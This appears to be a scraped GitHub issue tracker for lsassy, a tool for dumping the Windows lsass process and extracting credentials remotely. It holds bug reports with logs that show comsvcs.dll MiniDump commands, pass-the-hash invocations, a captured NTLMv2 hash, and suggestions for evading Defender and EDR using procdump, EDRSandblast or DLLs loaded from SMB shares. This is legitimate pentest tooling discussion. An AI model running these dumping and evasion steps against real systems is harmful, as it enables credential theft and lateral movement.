login-securite / lsassy Goto Github PK
View Code? Open in Web Editor NEWExtract credentials from lsass remotely
Home Page: https://en.hackndo.com/remote-lsass-dump-passwords/
License: MIT License
Extract credentials from lsass remotely
Home Page: https://en.hackndo.com/remote-lsass-dump-passwords/
License: MIT License
Describe the bug
The README still says that you need SYSTEM privs for the rundll32 method, but the comment in the code (https://github.com/Hackndo/lsassy/blob/master/cme/lsassy.py#L171) says otherwise.
Expected behavior
Don't have contradictory statements ;)
Additional context
Since the line in the code is newer than the line in the README, I assume that the statement in the code is correct.
Lsassy currently only supports wmi and task exec methods. Wmi does not work through an ntlmrelayx socks proxy, and the task exec method seems flaky at best when run through a proxy. Adding an SMB execution method would allow lsassy to be run through relayed SMB sessions.
Describe the bug
When executing the lsassy module against a target with the Windows Firewall on, the only execution method that works is atexec [an issue has been opened on the wmiexec command execution on the crackmapexec repo]. Because of this there are errors in how lsassy executes with the atexec execution method. When the firewall is off on the target the wmiexec command execution can be invoked thus successfully dumping the hashes.
Expected behavior
A remote dump of the lsass.exe and parsing of the dump file via lsassy.
target: Windows 10 18362 x64
cme: 4.0.1dev - Bug Pr0n
Error Output
DEBUG Executed command via atexec
DEBUG Generated argument XML: /C powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\tmp.dmp full;Wait-Process -Id (Get-Process rundll32).id" > \192.168.1.153\NLOKA\oucvFSxf.tmp 2>&1
DEBUG Creating task \oucvFSxf
DEBUG Running task \oucvFSxf
DEBUG Calling SchRpcGetLastRunInfo for \oucvFSxf
DEBUG Deleting task \oucvFSxf
DEBUG Incoming connection (192.168.1.252,50020)
DEBUG AUTHENTICATE_MESSAGE (GOT\WINTERFELL$,WINTERFELL)
DEBUG User WINTERFELL$\WINTERFELL authenticated successfully
DEBUG WINTERFELL$::GOT:4141414141414141:b635f6e492d9e85624cb3886b83e7b95:01010000000000008007cd18bce5d5010ce526e326a10e24000000000100100059004800730059007000480050004500020010004f0065006a0073007400470044006d000300100059004800730059007000480050004500040010004f0065006a0073007400470044006d00070008008007cd18bce5d5010600040002000000080030003000000000000000000000000040000063588c65f063ba4b97b74983ae6ff6ddef1d8b7a4e49e474f4df8552b01d64ea0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e0031002e003100350033000000000000000000
LSASSY 192.168.1.252 445 WINTERFELL [+] Process lsass.exe was successfully dumped
LSASSY 192.168.1.252 445 WINTERFELL [*] Parsing dump file with lsassy
DEBUG Lsassy command : lsassy -j -q --hashes : --dumppath 'C$/Windows/Temp//tmp.dmp' 'GOT/administrator:[email protected]'
LSASSY 192.168.1.252 445 WINTERFELL [-] Error while executing lsassy, try using CrackMapExec with --verbose to get more details
DEBUG Detailed error : Traceback (most recent call last):
File "/usr/local/lib/python3.7/dist-packages/impacket/smbconnection.py", line 546, in openFile
securityFlags, oplockLevel, createContexts)
File "/usr/local/lib/python3.7/dist-packages/impacket/smb3.py", line 989, in create
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.7/dist-packages/impacket/smb3structs.py", line 437, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.7/dist-packages/lsassy/impacketconnection.py", line 83, in openFile
fid = self.conn.openFile(tid, fpath, desiredAccess=FILE_READ_DATA)
File "/usr/local/lib/python3.7/dist-packages/impacket/smbconnection.py", line 548, in openFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/bin/lsassy", line 10, in
sys.exit(run())
File "/usr/local/lib/python3.7/dist-packages/lsassy/main.py", line 84, in run
ifile.open(conn, file_path)
File "/usr/local/lib/python3.7/dist-packages/lsassy/impacketfile.py", line 33, in open
self._fid = self._conn.openFile(self._tid, self._fpath)
File "/usr/local/lib/python3.7/dist-packages/lsassy/impacketconnection.py", line 91, in openFile
raise Exception(e)
Exception: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
LSASSY 192.168.1.252 445 WINTERFELL [-] Error deleting lsass dump : SMB SessionError: STATUS_NO_SUCH_FILE({File Not Found} The file %hs does not exist.)
Additional context
The issue regarding wmiexec against a firewalled target can be found here: byt3bl33d3r/CrackMapExec#336
An unknown error has occurred when running lsassy v3.0.0. No error when running using v2
No error and a dump
┌──(mpgn㉿kali)-[~/lsassy]
└─$ poetry run lsassy -u harry -p October2021 192.168.133.167 -vvvvv -e task 1 ⨯
[*] 192.168.133.167 SMB session opened
[+] 192.168.133.167 Authentication successful
[*] 192.168.133.167 Dumping via lsassy.dumpmethod.comsvcs
[*] 192.168.133.167 Trying task method
[*] 192.168.133.167 Building command - Exec Method has seDebugPrivilege: True | seDebugPrivilege needed: True | Powershell allowed: True
[*] 192.168.133.167 for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\rbIVN9ar.dmp full
[*] 192.168.133.167 Transformed command: cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\rbIVN9ar.dmp full
[*] 192.168.133.167 Executing using lsassy.exec.task
[*] 192.168.133.167 Register random task 593R2vzw
[*] 192.168.133.167 /Windows/Temp//rbIVN9ar.dmp handle acquired
[+] 192.168.133.167 Lsass dumped successfully in C:\Windows\Temp\rbIVN9ar.dmp
[*] 192.168.133.167 Found ThreadListStream @648 Size: 1444
[*] 192.168.133.167 Found ModuleListStream @bf8 Size: 13288
[*] 192.168.133.167 Found Memory64ListStream @10517 Size: 14416
[*] 192.168.133.167 Found SystemInfoStream @bc Size: 56
[*] 192.168.133.167 Found MiscInfoStream @f4 Size: 1364
[*] 192.168.133.167 Found SystemMemoryInfoStream @3fe0 Size: 492
[*] 192.168.133.167 SystemMemoryInfoStream parsing is not implemented (Missing documentation)
[*] 192.168.133.167 Found ProcessVmCountersStream @41cc Size: 152
[*] 192.168.133.167 ProcessVmCountersStream parsing is not implemented (Missing documentation)
[*] 192.168.133.167 Found UnusedStream @0 Size: 0
[*] 192.168.133.167 Found UnusedStream @0 Size: 0
[*] 192.168.133.167 Found UnusedStream @0 Size: 0
[*] 192.168.133.167 Found UnusedStream @0 Size: 0
[*] 192.168.133.167 Found UnusedStream @0 Size: 0
[*] 192.168.133.167 Found UnusedStream @0 Size: 0
[*] 192.168.133.167 None
[x] 192.168.133.167 An unknown error has occurred.
Traceback (most recent call last):
File "/home/mpgn/lsassy/src/lsassy/core.py", line 180, in run
credentials = Parser(file).parse(parse_only=parse_only)
File "/home/mpgn/lsassy/src/lsassy/parser.py", line 19, in parse
pypy_parse = pypykatz.parse_minidump_external(self._dumpfile)
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/pypykatz.py", line 164, in parse_minidump_external
mimi.start()
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/pypykatz.py", line 338, in start
self.get_kerberos()
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/pypykatz.py", line 309, in get_kerberos
dec.start()
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/lsadecryptor/packages/kerberos/decryptor.py", line 110, in start
self.process_session(kerberos_logon_session)
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/lsadecryptor/packages/kerberos/decryptor.py", line 209, in process_session
self.walk_list(kerberos_logon_session.Tickets_1.Flink, self.handle_ticket , override_ptr = self.decryptor_template.kerberos_ticket_struct)
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/lsadecryptor/package_commons.py", line 182, in walk_list
callback(entry)
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/lsadecryptor/packages/kerberos/decryptor.py", line 87, in handle_ticket
raise e
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/lsadecryptor/packages/kerberos/decryptor.py", line 83, in handle_ticket
kt = KerberosTicket.parse(kerberos_ticket, self.reader, self.decryptor_template.sysinfo, self.current_ticket_type)
File "/home/mpgn/.cache/pypoetry/virtualenvs/lsassy-Y5fUQQ3o-py3.9/lib/python3.9/site-packages/pypykatz/commons/kerberosticket.py", line 134, in parse
kt.ServiceName_type = kerberos_ticket.ServiceName.read(reader).NameType
AttributeError: 'NoneType' object has no attribute 'NameType'
[*] 192.168.133.167 Cleaning...
[*] 192.168.133.167 dumper: <lsassy.dumpmethod.comsvcs.DumpMethod object at 0x7f4180cebf40>
[*] 192.168.133.167 file: <lsassy.impacketfile.ImpacketFile object at 0x7f4180cdd5b0>
[*] 192.168.133.167 session: <lsassy.session.Session object at 0x7f4180cdd520>
[*] 192.168.133.167 Dumper cleaned
[*] 192.168.133.167 File closed
If I comment the code so the dump file is not deleted, I can read it with pypykatz as minidump.
As discussed it would be pretty useful if we could see the expiry datetime of the Kirbi tickets, potentially in their filename if not too long. Also in a universal date format, not with month before the day which is confusing for non-Americans :-). These tickets are generated from this command:
lsassy 192.168.32.131 -u Administrator -p Password1 --users -K tickets -dc-ip 192.168.32.131
This would help us priortise which ones are ending soonest and also allow us to pick and choose which ones we want to convert to a ccache file.
Current filenames:
Lsassy Version: lsassy v3.1.6 - Remote lsass dump reader
CME version: 5.2.3
Command run:
cme smb targets.txt -u username -H ntlmhashvalue --local-auth --no-bruteforce -M lsassy
Error Message:
File "/usr/local/bin/cme", line 8, in <module>
sys.exit(main())
File "/ptest/pipx/venvs/crackmapexec/lib/python3.8/site-packages/cme/crackmapexec.py", line 254, in main
asyncio.run(
File "/usr/lib/python3.8/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.8/asyncio/base_events.py", line 616, in run_until_complete
return future.result()
File "/ptest/pipx/venvs/crackmapexec/lib/python3.8/site-packages/cme/crackmapexec.py", line 102, in start_threadpool
await asyncio.gather(*jobs)
File "/ptest/pipx/venvs/crackmapexec/lib/python3.8/site-packages/cme/crackmapexec.py", line 68, in run_protocol
await asyncio.wait_for(
File "/usr/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
return await fut
File "/usr/lib/python3.8/concurrent/futures/thread.py", line 57, in run
result = self.fn(*self.args, **self.kwargs)
File "/ptest/pipx/venvs/crackmapexec/lib/python3.8/site-packages/cme/protocols/smb.py", line 125, in __init__
connection.__init__(self, args, db, host)
File "/ptest/pipx/venvs/crackmapexec/lib/python3.8/site-packages/cme/connection.py", line 62, in __init__
self.proto_flow()
File "/ptest/pipx/venvs/crackmapexec/lib/python3.8/site-packages/cme/connection.py", line 100, in proto_flow
self.call_modules()
File "/ptest/pipx/venvs/crackmapexec/lib/python3.8/site-packages/cme/connection.py", line 132, in call_modules
self.module.on_admin_login(context, self)
File "/ptest/pipx/venvs/crackmapexec/lib/python3.8/site-packages/cme/modules/lsassy_dump.py", line 55, in on_admin_login
dumper = Dumper(session, timeout=10).load(self.method)
TypeError: __init__() missing 1 required positional argument: 'time_between_commands'
I just got a strange behavior here. I have setup one pivot and I am running this command from my attacker machine:
lsassy -d 'final.com' -u 'Administrator' -H '8388d0760....' 172.16.207.187 -vv -debug
[*] MainThread lsassy v 3.1.9
[*] [Core] Targets: ['172.16.207.187']
[*] [Core] Created target: 1: 172.16.207.187
[*] 172.16.207.187 smb_session: <impacket.smbconnection.SMBConnection object at 0x7fe16afd9650>
[x] 172.16.207.187 Connection error
Traceback (most recent call last):
File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smbconnection.py", line 278, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smb3.py", line 1006, in login
if packet.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smb3structs.py", line 458, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/lsassy/session.py", line 53, in get_session
self.smb_session.login(username, password, domain, lmhash, nthash)
File "/home/kali/.local/pipx/venvs/lsassy/lib/python3.11/site-packages/impacket/smbconnection.py", line 280, in login
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[!] 172.16.207.187 Couldn't connect to remote host
[*] 172.16.207.187 Cleaning...
[*] 172.16.207.187 dumper: None
[*] 172.16.207.187 file: None
[*] 172.16.207.187 session: <lsassy.session.Session object at 0x7fe16a3f5310>
[*] 172.16.207.187 Potential issue while cleaning dumper: 'NoneType' object has no attribute 'clean'
[*] 172.16.207.187 Potential issue while closing file: 'NoneType' object has no attribute 'close'
[*] 172.16.207.187 Couldn't delete lsass dump using file. Trying dump object...
[*] 172.16.207.187 Potential issue while deleting lsass dump: 'NoneType' object has no attribute 'dump_path'
[*] 172.16.207.187 Potential issue while closing SMB session: 'NoneType' object has no attribute 'close'
But with -debug
it works...
lsassy -d 'final.com' -u 'Administrator' -H '8388d0760....' 172.16.207.187 -vv -debug
[*] MainThread lsassy v 3.1.9
[*] [Core] Targets: ['172.16.207.187']
[*] [Core] Created target: 1: 172.16.207.187
[*] 172.16.207.187 smb_session: <impacket.smbconnection.SMBConnection object at 0x7f2d69e36f10>
[*] 172.16.207.187 SMB session opened
[*] 172.16.207.187 Connecting to C$
[*] 172.16.207.187 Authentication successful
[*] 172.16.207.187 Dumping via lsassy.dumpmethod.comsvcs
[*] 172.16.207.187 Exec method: <lsassy.exec.smb.Exec object at 0x7f2d69c83710>
[*] 172.16.207.187 Exec method: <lsassy.exec.wmi.Exec object at 0x7f2d69c3cbd0>
[*] 172.16.207.187 Exec method: <lsassy.exec.task.Exec object at 0x7f2d46ea8b90>
[*] 172.16.207.187 Exec method: <lsassy.exec.mmc.Exec object at 0x7f2d46ee6c10>
[*] 172.16.207.187 Exec Methods: {'smb': <lsassy.exec.smb.Exec object at 0x7f2d69c83710>, 'wmi': <lsassy.exec.wmi.Exec object at 0x7f2d69c3cbd0>, 'task': <lsassy.exec.task.Exec object at 0x7f2d46ea8b90>, 'mmc': <lsassy.exec.mmc.Exec object at 0x7f2d46ee6c10>}
[*] 172.16.207.187 Trying smb method
[*] 172.16.207.187 Building command - Exec Method has seDebugPrivilege: True | seDebugPrivilege needed: True | Powershell allowed: True | Copy executor: False
[*] 172.16.207.187 ['for /f "tokens=1,2 delims= " ^%A in (\'"tasklist /fi "Imagename eq lsass.exe" | find "lsass""\') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, #+0000^24 ^%B \\Windows\\Temp\\lZ2tWb35F.vsv full']
[*] 172.16.207.187 Transformed command: CMd.eXe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%B \Windows\Temp\lZ2tWb35F.vsv full
[*] 172.16.207.187 Executing using lsassy.exec.smb
[*] 172.16.207.187 StringBinding ncacn_np:172.16.207.187[\pipe\svcctl]
[*] 172.16.207.187 Service JIjOseGv created
[*] 172.16.207.187 Service JIjOseGv deleted
[*] 172.16.207.187 /Windows/Temp//lZ2tWb35F.vsv handle acquired
[*] 172.16.207.187 Lsass dumped in C:\Windows\Temp\lZ2tWb35F.vsv (47628591 Bytes)
[*] 172.16.207.187 File C$/Windows/Temp//lZ2tWb35F.vsv deleted
[*] 172.16.207.187 Lsass dump deleted
I've cut off the end so as not to reveal the hashes. I don't know if you'll be able to do anything about this one @Hackndo, but I'd love to get your take on it.
Add an export feature that allows an export of the credentials found with lsassy into a file.
Exemple
lsassy adsec.local/jsnow:[email protected] --export /tmp/my_export
Where my_export contains:
machine[TAB]domain\user[TAB]hash[TAB]cleartext
machine[TAB]machine\user[TAB]hash[TAB]cleartext
why tabulations as delimiter ? To avoid problem since a cleartext password can contains special char.
Hello Pixis (and potential EDRSandblast users),
I recommend to use both --usermode
and --kernelmode
options (the former does not imply the latter).
Since loading a driver is needed for the kernel land bypasses to take place, and NtLoadDriver
syscall might be hooked in userland, using both options reduces the risk of detection ;)
cheers
Under certain circumstances (e.g. Microsoft Defender active), no dump can be performed with lsassy. This is due to the fact that the dump of the lsass.exe process is considered.
However, the following works:
$ psexec.py host.example.com 'tasklist /fi "imagename eq lsass.exe"'
[CUT]
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
lsass.exe 1337 Services 0 49,680 K
[CUT]
$ psexec.py -c procdump64.exe host.example.com '-accepteula -ma 1337 c:\lsass.dmp'
[CUT]
[01:23:45] Dump 1 initiated: c:\lsass.dmp
[CUT]
I don't know whether it would make sense for you to include this bypass in lsassy?
Thanks for your awesome work! :)
Describe the bug
Stack trace when access refused
Expected behavior
Nice error message
Describe the bug
When using lsassy with both the -o and -f switches, the output file is always in the same standard format:
$ lsassy -u Administrator -d TEST.LOCAL -p toto 172.16.1.1 -o creds.json -f json
$ cat creds.json
172.16.1.1 TEST\Administrator :fbbf55d0ef0e34d39593f55c5f2ca5f2
Expected behavior
The output should be:
$ lsassy -u Administrator -d TEST.LOCAL -p toto 172.16.1.1 -o creds.json -f json
$ cat creds.json
{"TEST": {"Administrator": [{"password": null, "lmhash": null, "nthash": "fbbf55d0ef0e34d39593f55c5f2ca5f2"}]}}
Describe the bug
When executing lsassy on more than 256 IP, there are too many forks. Need to paginate the execution.
Traceback (most recent call last):
File "/home/wilfried/.local/bin/lsassy", line 10, in <module>
sys.exit(run())
File "/home/wilfried/.local/lib/python3.7/site-packages/lsassy/core.py", line 226, in run
job.start()
File "/usr/lib/python3.7/multiprocessing/process.py", line 112, in start
self._popen = self._Popen(self)
File "/usr/lib/python3.7/multiprocessing/context.py", line 223, in _Popen
return _default_context.get_context().Process._Popen(process_obj)
File "/usr/lib/python3.7/multiprocessing/context.py", line 277, in _Popen
return Popen(process_obj)
File "/usr/lib/python3.7/multiprocessing/popen_fork.py", line 20, in __init__
self._launch(process_obj)
File "/usr/lib/python3.7/multiprocessing/popen_fork.py", line 69, in _launch
parent_r, child_w = os.pipe()
OSError: [Errno 24] Too many open files
Not sure if running in pipenv shell is the issue, but getting the error after a successful dump of lsass.exe:
Detailed error : /bin/sh: 1: lsassy: not found
Thoughts?
First of all Great tool
I got detected by windows defender is there any method that you guys use to bypass it?
i give the tool a try but got flagged by windows defender latest version full patched
Probably not a bug and more likely a mis-usage of my part but I could not find much info.
I am executing the following command:
lsassy -d SomeDomain -u SomeAdminUser -p SomePassword 10.0.2.4
But I am getting the following error:
[X] [10.0.2.4] Either lsass is protected or target might be slow or procdump/dumpert wasn't provided
Also, tried adding -m with 0-5 and providing prodump and dumpert but still getting the same error.
If I log into machine 10.0.2.4, I can dump lsass using prodump or taskmgr.
Seem to be an issue when you have a $ in the password.
Command
cme --verbose smb 192.168.100.100 -u 'Admin' -p 'Password$' -d oliverhume -M lsassy
Error Message the @ has gone missing.
Domain/Admin:Password192.168.100.100:/C$/Windows/Temp//tmp.dmp is not valid. Expected format : [domain/]username[:password]@host:/share_name/path/to/file
Describe the bug
When using Bloodhound with CME module, if local Administrator account was dumped, lsassy thinks it's domain account, and returns "PATH TO DA"
Expected behavior
Detect local account
Hello, most way to get code execution are nowadays flagged by EDR/AV. But, winRm
is way more legitimate and could by another way of executing code remotely. Could this be added as a feature?
Thanks in advance,
Best regards
I am receiving the following error when attempting to use the CME module, please advise.
Hi! Thanks for this :)
Having errors on the 2 methods in your tool, probably something related to the environment (using Detectionlab).
Tried to disable RPC restriction, disabled the FW:
https://help.pdq.com/hc/en-us/articles/220533007
https://support.microsoft.com/en-ae/help/895085/you-receive-an-access-is-denied-error-message-on-a-windows-server-2003
https://support.microsoft.com/en-ca/help/2623670/access-denied-or-other-errors-when-you-access-or-work-with-files-and-f
Nothing so far. Any idea?
Again, Thanks!
Rundll32:
root@kali:~/Desktop# lsassy windomain.local/vagrant:[email protected]
[+] Authenticated
[*] Using DLL Method (default)
Traceback (most recent call last):
File "/usr/local/bin/lsassy", line 10, in
sys.exit(run())
File "/usr/local/lib/python3.7/dist-packages/lsassy/main.py", line 79, in run
file_path = dumper.dump("dll")
File "/usr/local/lib/python3.7/dist-packages/lsassy/dumper.py", line 27, in dump
self.dlldump()
File "/usr/local/lib/python3.7/dist-packages/lsassy/dumper.py", line 51, in dlldump
TASK_EXEC(self._conn, self._log).execute(command)
File "/usr/local/lib/python3.7/dist-packages/lsassy/taskexe.py", line 28, in execute
tsch.hSchRpcRegisterTask(dce, '\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/tsch.py", line 637, in hSchRpcRegisterTask
return dce.request(request)
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 856, in request
answer = self.recv()
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1320, in recv
raise DCERPCException(rpc_status_codes[status_code])
impacket.dcerpc.v5.rpcrt.DCERPCException: rpc_s_access_denied
Procdump:
oot@kali:~/Desktop# lsassy -p procdump64.exe windomain.local/vagrant:[email protected]
[+] Authenticated
[*] Using Procdump Method
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 812, in putFile
return self._SMBConnection.stor_file(shareName, pathName, callback)
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1565, in storeFile
treeId = self.connectTree(shareName)
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 858, in connectTree
if packet.isValidAnswer(STATUS_SUCCESS):
File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 437, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.7/dist-packages/lsassy/impacketconnection.py", line 132, in putFile
self.conn.putFile(share_name, path_name, callback)
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 816, in putFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/bin/lsassy", line 10, in
sys.exit(run())
File "/usr/local/lib/python3.7/dist-packages/lsassy/main.py", line 77, in run
file_path = dumper.dump("procdump")
File "/usr/local/lib/python3.7/dist-packages/lsassy/dumper.py", line 29, in dump
self.procdump(exec_methods)
File "/usr/local/lib/python3.7/dist-packages/lsassy/dumper.py", line 67, in procdump
self._conn.putFile(self._share, self._tmp_dir + self._procdump, procdump.read)
File "/usr/local/lib/python3.7/dist-packages/lsassy/impacketconnection.py", line 135, in putFile
raise Exception("An error occured while uploading %s on %s share : %s" % (path_name, share_name, e))
Exception: An error occured while uploading \Windows\Temp\procdump.exe on C$ share : SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
lsassy is a Python tool designed to remotely extract credentials from a set of hosts, particularly targeting the lsass process on these hosts. This is done in two steps First, code must be executed on the remote target to dump lsass. Then, the dump must be parsed remotely to extract the passwords.
Here is how a dump and parsing works in a nutshell:
From console.py, the ThreadPool is used to execute different lsassy instances in different threads
https://github.com/Hackndo/lsassy/blob/4b1ddf1b3491b014aa27a68f3aa26cb0c962b0a5/lsassy/core.py#L149
Get an SMB session with the target and provided credentials (checks for admin rights)
https://github.com/Hackndo/lsassy/blob/4b1ddf1b3491b014aa27a68f3aa26cb0c962b0a5/lsassy/core.py#L170
Get the dumping method (defined globally in https://github.com/Hackndo/lsassy/blob/master/lsassy/dumpmethod/__init__.py and every dump method will override get_commands)
https://github.com/Hackndo/lsassy/blob/4b1ddf1b3491b014aa27a68f3aa26cb0c962b0a5/lsassy/core.py#L175 to actually dump lsass remotely.
For dumping lsass, a command line is remotely executed on the target using one of the executors (SMB using services by default, code stolen from impacket)
Checks if dump was successful
https://github.com/Hackndo/lsassy/blob/4b1ddf1b3491b014aa27a68f3aa26cb0c962b0a5/lsassy/core.py#L193
Then back to core.py, instantiating Parser that will use Pypykatz project to parse the lsass dump remotely.
https://github.com/Hackndo/lsassy/blob/4b1ddf1b3491b014aa27a68f3aa26cb0c962b0a5/lsassy/core.py#L208
To write credentials in console (and file if asked)
I want to create tests for lsassy to ensure that all features and options work correctly with each new version release.
I know how to create tests for everything that happens locally on my machine (and on Github actions), like testing threads number, instantiating classes dynamically, stuff like that.
The problem I encounter is testing network functionalities. I know about mock
from unittest
but I don't think it's enough for what I need.
For instance:
These are behaviors I can test if I execute lsassy in a controlled environment, with a Windows machine whose IP address I know. However, I would like to be able to launch tests from anywhere.
One solution I can think of would be to use Docker, with a Linux machine executing the tool, and a Windows machine that would be the target.
But I'm not sure it's a good solution, and I would really appreciate some input
Thanks a lot
Please implement an option that doesn't perform dumping just parses an already existing remote LSASS dump.
This would be beneficial for the following cases:
Thank you.
Hi,
Is there a reason the scheduled task is scheduled to run every day at the same hour? From my understanding, it should run only once and on demand. In case the scheduled task fails to get deleted, it will dump lsass for eternity.
File: https://github.com/Hackndo/lsassy/blob/master/lsassy/exec/taskexe.py
Code:
`
`
Thanks :)
Is there a way to prevent the script from deleting the LSASS dmp during script execution during cleanup?
The issue is that the setup.py is deploying the tests
folder under the root python path and not under this package one.
So it's end up under /usr/lib/python3.11/site-packages/tests
rather than /usr/lib/python3.11/site-packages/lsassy /tests
and so conflicts with other packages having the same issue.
Anyway usually test are not shipped in a release package so the easiest would just to remove them. Else they should be deployed in the children directory.
It's explained in ArchLinux packaging guidelines for Python: https://wiki.archlinux.org/title/Python_package_guidelines#Test_directory_in_site-package
Hello! First I would like to say congratulations on the 3.0.0 release, the new improvements look awesome! I had an idea while reading some of the new dumping methods, specifically dumpertdll.
rundll32
can run DLLs from SMB shares, they don't have to be on the disk. My idea was to run an SMB share (like with Samba
or impacket-smbshare
, not lsassy) and then place the dumpert DLL file in that share. You could then provide the UNC path to the dumpert DLL in the "dumpertdll_path" option, and lsassy would tell rundll32
to call the dumpert DLL from the SMB share, instead of having to upload it.
I've had lots of luck with this method when trying to spawn sliver
agents using a DLL loaded from an SMB share, and it would also prevent the OPSEC hit of having to upload the file to disk. Finally, if something goes wrong during the dump (like AV gets wind of what your doing) there is no risk of the dumpert DLL persisting after aborted execution because it couldn't be deleted.
When relaying NTLM authentications, ntlmrelayx.py has the ability to open SOCKS proxies, hence allowing other scripts like secretsdump, psexec and so on to do their things via these proxies. It could be nice to add this feature to lsassy.
In addition to that, some impacket script have the -no-pass
option allowing to connect through those proxies without having to enter a password or hash, since the authentication has already happened when relaying.
I don't think I'd have the time or ability to add this feature to lsassy so here you go :)
Describe the bug
Maybe not so much a bug as a desire to see if it would run in WSL. Thinking Windows store apps can be accessed by non-admin users and then install Ubuntu along with lsassy. Should this be a pull request? A little new to the game here but testing my limits.
Expected behavior
Here are my steps:
Install WSL on Win10 device
Install Ubuntu from Windows store
Check if Python3 is installed
python3 --version
Install Python 3 (if needed)
sudo apt install python3
Update apt-get
sudo apt-get update
Install netaddr
sudo apt-get install -y python-netaddr
Pip3 install netaddr
Install pip3
sudo apt-get install python3-pip
Install pypykatz
pip3 install pypykatz
Clone Impacket
sudo git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
sudo python3 setup.py install
Install lsassy
sudo python3.6 -m pip install lsassy
Screenshots
Additional context
The command and results
user@computer:/$ lsassy domain/%username%:%Password%@%FQDN_deviceName
Traceback (most recent call last):
File "/usr/local/bin/lsassy", line 11, in
sys.exit(run())
File "/usr/local/lib/python3.6/dist-packages/lsassy/core.py", line 208, in run
targets = get_targets(get_args().target)
File "/usr/local/lib/python3.6/dist-packages/lsassy/utils/utils.py", line 134, in get_targets
ret_targets += parse_targets(target)
File "/usr/local/lib/python3.6/dist-packages/lsassy/utils/utils.py", line 101, in parse_targets
t = IPRange(ip_range[0], ip_range[1])
File "/usr/local/lib/python3.6/dist-packages/netaddr/ip/init.py", line 1357, in init
self._start = IPAddress(start, flags=flags)
File "/usr/local/lib/python3.6/dist-packages/netaddr/ip/init.py", line 280, in init
% self.class.name)
